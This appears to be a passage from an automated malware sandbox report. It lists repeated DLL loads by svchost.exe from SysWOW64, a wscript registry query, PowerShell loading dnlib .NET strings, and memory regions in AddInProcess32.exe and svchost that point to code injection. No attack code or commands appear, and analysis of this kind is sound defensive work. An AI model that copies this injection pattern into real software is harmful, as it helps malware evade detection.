            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Google Drive.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: YouTube.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Sheets.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Gmail.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Slides.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Docs.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2452048534.00007FF848F10000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 0000000A.00000002.3372031467.0000000003E07000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371896205.0000000003DE7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3369020881.00000000017F7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3368884407.00000000017D7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3369228393.0000000001817000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371223912.0000000003C17000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3365846362.000000000160D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3369907373.0000000003127000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3364606338.0000000001537000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371787930.0000000003DC7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371439220.0000000003C37000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3368577514.00000000017B7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371561302.0000000003C57000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3364223051.0000000001512000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2324999391.00000000029C2000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000011.00000002.2401038340.0000000002882000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000017.00000002.2498372356.0000000002AC2000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000001F.00000002.2602124639.0000000002A62000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000025.00000002.2696343691.0000000002E82000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000002C.00000002.2771398420.00000000027B2000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000032.00000002.2867044582.00000000025E2000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000038.00000002.2943823106.0000000002D22000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000003E.00000002.3041192141.0000000002722000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000044.00000002.3147242188.0000000002D02000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000004A.00000002.3224086435.0000000002A32000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000050.00000002.3314541028.0000000002E32000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000056.00000002.3360669578.00000000032E2000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
